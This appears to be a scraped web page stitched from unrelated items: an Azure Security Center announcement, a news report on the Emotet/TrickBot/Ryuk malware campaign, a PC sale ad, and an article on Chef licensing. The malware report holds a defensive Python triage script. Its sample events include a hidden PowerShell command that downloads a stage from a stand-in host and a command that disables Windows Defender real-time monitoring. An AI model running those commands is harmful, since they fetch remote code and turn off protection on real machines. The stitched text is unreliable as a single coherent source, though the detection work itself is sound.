Announcing new capabilities for the Microsoft Azure Security Center – Microsoft Security

Microsoft Azure Security Center—the central hub for monitoring and protecting against related incidents within Azure—has released new capabilities. The following features—announced at Hannover Messe 2019—are now generally available for the Azure Security Center:

  • Advanced Threat Protection for Azure Storage—Layer of protection that helps customers detect and respond to potential threats on their storage account as they occur—without having to be an expert in security.
  • Regulatory compliance dashboard—Helps Security Center customers streamline their compliance process by providing insight into their compliance posture for a set of supported standards and regulations.
  • Support for Virtual Machine Scale Sets (VMSS)—Easily monitor the security posture of your VMSS with security recommendations.
  • Dedicated Hardware Security Module (HSM) service, now available in U.K., Canada, and Australia—Provides cryptographic key storage in Azure and meets the most stringent customer security and compliance requirements.
  • Azure disk encryption support for VMSS—Now Azure disk encryption can be enabled for Windows and Linux VMSS in Azure public regions—enabling customers to help protect and safeguard the VMSS data at rest using industry standard encryption technology.

In addition, support for virtual machine scale sets is now generally available as part of the Azure Security Center. To learn more, read our Azure blog.

Author: Microsoft News Center

‘Triple threat’ malware campaign combines Emotet, TrickBot and Ryuk

Cybereason researchers discovered a malware campaign in which attackers combined the Emotet and TrickBot banking Trojans to deliver the Ryuk ransomware.

The malware campaign, dubbed “triple threat,” also uses TrickBot to perform lateral movement and employs detection evasion methods, like attempts to disable Windows Defender, Cybereason’s active monitoring and hunting teams found.

According to researchers, the campaign is targeting companies in both Europe and the U.S.

“The most interesting thing about this campaign is how it combined Emotet, TrickBot and Ryuk together,” said Lior Rochberger, security analyst at Cybereason. “Emotet is very common. But the way attackers abused this and took advantage of this malware in order to deliver another malware and, in the end, deliver the [Ryuk] ransomware to maximize the damage is something that is very unique.” 

The first phase of the malware campaign begins with a phishing email, in which a weaponized Microsoft Office document containing malicious macro-based code is delivered to the user. Once the user opens the document, the malicious file runs and executes a PowerShell command.

The PowerShell command then attempts to download the Emotet payload from different malicious domains.

Once the Emotet payload executes, it continues infecting and gathering information on the affected machine, Cybereason researchers explained in a blog post.

In the second phase of the attack, Emotet initiates the download and execution of the TrickBot Trojan by communicating with a remote host. Once TrickBot infects the machine, it begins to steal sensitive information, such as administrator credentials.

It is TrickBot’s modular structure, researchers said, that allows it to add new functionalities outside of collecting banking data, such as collecting passwords and evading detection.

TrickBot’s modules are injected into legitimate processes in order to evade detection. Its modules include spreader_x64.dll, which spreads TrickBot by exploiting EternalBlue, which takes advantage of a flaw in Windows’ Server Message Block (SMB) protocol.

[Figure: Flow of the attack as Emotet delivers TrickBot, which delivers Ryuk.]

Upon execution, TrickBot also tries to disable and delete Windows Defender to evade detection by antimalware products, researchers found.

In the final phase of the attack, the attackers check to see if the target machine is part of an industry they want to target. If it is, they download the Ryuk ransomware payload and use the admin credentials stolen using TrickBot to perform lateral movement and reach the assets they wish to infect, researchers said.
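The chain described above (an Office document launching PowerShell, PowerShell fetching a payload from a remote host, and later tampering with Windows Defender) leaves a recognisable trail in endpoint process-creation telemetry. The following is an added example written for this page, not tooling from Cybereason or the article; it triages a handful of constructed Sysmon-style process events (the field names pid, ppid, image and cmdline are assumptions) and reports which of those three behaviours each event matches.

```python
"""Toy process-creation triage for the Emotet -> TrickBot -> Ryuk chain.

Added example, not Cybereason's code. Events are constructed; the field
layout (pid, ppid, image, cmdline) is an assumption about the telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, e.g. "winword.exe"
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download primitives that a macro-launched stager would use to pull a payload.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|start-bitstransfer",
    re.I,
)
# Defender tampering: disabling a Defender setting, or stopping/deleting the WinDefend service.
DEFENDER_RE = re.compile(
    r"set-mppreference.*-disable\w*|\b(sc|net)(\.exe)?\s+(stop|delete)\s+windefend\b",
    re.I,
)


def triage(events):
    """Return a list of (pid, rule_name) findings, one per matching rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        image = e.image.lower()
        parent = by_pid.get(e.ppid)
        # Rule 1: an Office application spawning a script host (macro execution).
        if parent and parent.image.lower() in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append((e.pid, "office_spawns_script_host"))
        # Rule 2: PowerShell reaching out to fetch a payload.
        if image in POWERSHELL and DOWNLOAD_RE.search(e.cmdline):
            findings.append((e.pid, "powershell_remote_download"))
        # Rule 3: attempts to disable or remove Windows Defender.
        if DEFENDER_RE.search(e.cmdline):
            findings.append((e.pid, "defender_tampering"))
    return findings


def likely_macro_delivery(findings):
    """True when one process both came from Office and performed a download."""
    rules_by_pid = {}
    for pid, rule in findings:
        rules_by_pid.setdefault(pid, set()).add(rule)
    return any({"office_spawns_script_host", "powershell_remote_download"} <= r
               for r in rules_by_pid.values())


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", 'WINWORD.EXE /n "invoice.doc"'),
    ProcEvent(300, 200, "powershell.exe",
              "powershell -w hidden -c (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
    ProcEvent(400, 300, "powershell.exe", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(500, 100, "powershell.exe", "powershell -c Get-Process"),   # benign admin use
]

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for pid, rule in hits:
        print(f"pid {pid}: {rule}")
    print("macro delivery chain suspected:", likely_macro_delivery(hits))
```

The benign PowerShell launched from Explorer (pid 500) produces no finding, while the Office-spawned stager (pid 300) trips two rules at once, which is the combination worth alerting on rather than either rule alone.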


“After the phase of the lateral movement, the reconnaissance activity, the credential theft and information stealing, then it basically delivers the Ryuk ransomware, which encrypts the files,” Rochberger said. “Ryuk injects the malicious payload into legitimate processes, and then it encrypts and ransoms the files. TrickBot also uses this technique to inject its malicious modules — DLLs [dynamic link libraries] — into legitimate processes. Due to this technique, normal and old-fashioned antivirus that is signature-based is not effective.”

But Rochberger said she believes this malware campaign doesn’t necessarily mean cybercriminal groups are joining forces to carry out attacks.

“We do see that different cybercriminal groups are using the same techniques or the same tools as other groups are using,” she said. “For example, the Ryuk itself was used by the Lazarus Group, but it doesn’t necessarily mean that this campaign was by the Lazarus Group. We know that the Ryuk code was on sale on the internet, so other threat actors may have used this code, as well, for their malicious activity.”

But given that the attackers are using malware like Emotet to spread the attack as an initial infection, Rochberger advised companies to be aware of how threat actors can take advantage of existing malware for new attacks and campaigns.

Researchers advised companies to employ threat hunting for detecting such malware campaigns and also be up to date with implementing patches, especially for the Windows SMB v1 vulnerability, to prevent the propagation of TrickBot and other malware.


For Sale – Watercooled PC (i7 4770K, GTX 980ti, 16GB DDR3, Corsair AX860) 480mm + 420mm Rads

Plan to strip this down. Would like to sell as complete system first.

Price: 1,100 GBP

Case:
Phanteks Enthoo Primo (includes PWM fan controller)


Price and currency: 1,100 GBP
Delivery: Delivery cost is not included
Payment method: BT
Location: Bristol / North Somerset
Advertised elsewhere?: Not advertised elsewhere
Prefer goods collected?: I prefer the goods to be collected


Chef licensing changes prompt debate among IT pros

Chef has overhauled the licensing terms for its IT automation software and some customers are apprehensive about what the changes might mean for their future IT budgets.

Chef has operated under what it terms a “loose” open core business model, where it distributes open source versions of Chef software for configuration management, InSpec for security and compliance, and Habitat for application automation. Chef Automate, a proprietary product, tied together Chef’s other software components for paying customers.

Starting this week, however, all of Chef’s software code, including Chef Automate, is available in open source repositories and developed under an open Apache 2.0 license, and customers that buy support have two suite subscription options: Effortless Infrastructure, which includes Chef Infra (the new name for Chef’s configuration management tool), InSpec and Automate; and the Enterprise Automation Stack, which adds Habitat. Each product will also be available separately as a subscription with updated pricing.


A sticking point for some users comes in the fine print for the new Chef licensing terms. This is where Chef retains its trademarks, which include Chef, InSpec, Habitat and Automate. Small IT teams can experiment with Chef’s binaries for free, but should they use the Chef software for commercial purposes, Chef requires them to pay for support or host their own renamed distribution of the code. These changes take effect with the release of Chef 15 next month, at which point Chef 13 support will end. Customers that use Chef 14 will have a year to decide how they’ll proceed with support contracts.

Customers that already have a commercial relationship with Chef will see no change to their costs, said Corey Scobie, senior vice president of product and engineering at Chef. “Users who have purely open source Chef at scale will have some decisions to make about whether to go out on their own or start a contractual relationship,” he said.

Chef users’ reactions mixed

Longtime Chef software customers said the move could enable Chef to prioritize enterprise customer support, and an open source version of the Chef Automate tool may pique fresh interest among developers.

“It makes a lot of sense from a business perspective to focus the company on the people who fund it,” said Michael Hedgpeth, director of software engineering at Atlanta-based NCR Corp., which makes point-of-sale systems, self-service kiosks, ATMs and other retail data processing systems.

However, Hedgpeth said he hoped to use open source Chef software to manage an internet of things (IoT) environment with millions of endpoints spread out over tens of thousands of customer locations, and is concerned about how the new license terms might play out there.


“It could upset the economic and operational equation,” he said. “As a hosted Chef Automate customer, I think it’s a positive thing, but as a technology evangelist working to expand Chef’s reach within NCR for IoT, it’s frustrating.”

Hedgpeth drew a comparison between Chef’s licensing terms and Red Hat’s business model for Red Hat Enterprise Linux. CentOS, a similar but free and open source version of that operating system, sprang up in the community about 10 years ago and is now supported by Red Hat.

“I want an official free alternative — if Chef wants to be Red Hat, let’s make a CentOS,” Hedgpeth said.

Chef isn’t opposed to that idea, said Brian Goldfarb, chief marketing officer at Chef. However, he pointed out that Red Hat and CentOS did not start out as collaborators and it will take time for a community-based version of Chef’s software code to mature.

Hedgpeth is a staunch Chef loyalist. NCR began with Chef Server five years ago, and its configuration management features eliminated 97% of deployment-related outages for his team. NCR renewed its Chef software license last week under the previous terms. But Hedgpeth said he isn’t sure how Chef license costs will play out in the next contract renewal next year.

“I’m kind of anchored to the pricing I remember from the beginning,” he said. “If I was looking for an IT automation platform now and had 100 or so nodes, it might make more sense, but I have thousands, and there’s the IoT issue.”

Chef is willing to negotiate volume discounts with large-scale customers such as NCR under the new licensing terms, Goldfarb said.

Business strategy a pervasive issue for open source companies

Chef’s licensing changes come amid an uneasy climate for vendors that base their business on open source code, from MongoDB and Redis spats with AWS to executive shuffles at companies such as Puppet and Docker Inc.

Chef’s founder and former CTO, Adam Jacob, who stepped down as CTO and switched to a role with the board of directors at Chef in January 2019, weighed in on the future of open core business in a December 2018 blog post. That kicked off a project founded by Jacob, Sustainable Free and Open Source Communities, “organized around the development of a set of shared principles that we believe lead to healthy, sustainable open source communities,” according to the group’s website.

Chef executives said they plan to take a different path to address the same problem that’s riled up MongoDB, Redis and similar vendors. They said their belief is that those peers have moved away from true open source code, while the open source donation of Chef Automate represents a step further toward it.

Some Chef software users in small shops predict that open source Chef Automate will expand the product’s influence and name recognition.

“We’re just getting started, but now we’ll have access to the whole suite, to experiment and test,” said Christopher Maher, a software engineer at a startup he asked not to be named. Maher previously used Chef software in an enterprise IT environment at Alaska Airlines. “Chef Automate can also benefit from community input, thousands of eyes that look at the product instead of a closed development group focused on the business,” he said.

The bottom line is that while Chef said it pulled in record revenue in the fourth quarter of 2018, it must focus on long-term financial growth and enterprise contract renewals in a fiercely competitive market.

“Making money in open source is really hard, and a lot of companies as they mature have to think about where their revenue is going to come from, and what their differentiation is,” said Stephen Elliot, analyst at IDC. “I expect them to have more focus on the bigger customers that want to choose Chef as a strategic platform, prioritize their feedback in feature backlogs, and increased levels of support.”

